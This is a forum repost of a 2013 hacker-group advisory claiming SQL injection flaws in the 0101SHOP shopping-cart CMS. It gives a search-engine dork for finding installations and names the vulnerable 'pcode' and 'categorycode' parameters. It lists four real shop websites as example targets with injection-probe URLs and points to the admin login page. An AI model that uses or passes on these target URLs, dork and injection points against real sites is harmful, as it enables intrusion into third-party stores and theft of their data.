Praetorian503 Posted February 18, 2013 Report Posted February 18, 2013 0101SHOP CMS suffers from multiple remote SQL injection vulnerabilities. Note that this finding houses site-specific data..:: In The Name Of God ::.##################################################### 0101SHOP CMS SQL Injection Vulnerability ## Security Risk : High ## Discovered By IRaNHaCK Security Team (MR.XpR ## Our WebSite : IRaNHaCK.ORG # # Tested On : XP , 7 , BackTrack ## Date : 2013-02-16 ## Version : All ## Category : WebApp # ####################################################================================================================1- Dork : intext:"Powered by 0101HOST - Shopping Cart System." = = 2- Vulnerability(s) : = =Target.Com/productdetails.asp?pcode=[SQL] =Target.Com/listproduct.asp?categorycode=[SQL] = =3- Example : =http://llsclifestyle.com/listproduct.asp?categorycode=101%27 =http://shop.pmcguild.hk/productdetails.asp?pcode=31043-150%27 =http://shop.honghaico.hk/listproduct.asp?categorycode=1%27 =http://shop.hkdongjian.com/listproduct.asp?categorycode=102%27 = =4- Admin Page : =Target.Com/adminlogin.asp =================================================================**********************************************************************************************We Are : Mr.XpR - UnknowN - FarbodEzRaeL - Bl4ck.Viper - Siamak.Black - MojiRider - V30Sharp *Mr.FixXxer - mr.remot3rs - nazila - HACKER OF FLOOD & All Members Of IRaNHaCK.ORG ***********************************************************************************************./By MojiRider ./Persian Gulf For EverSource: PacketStorm Quote
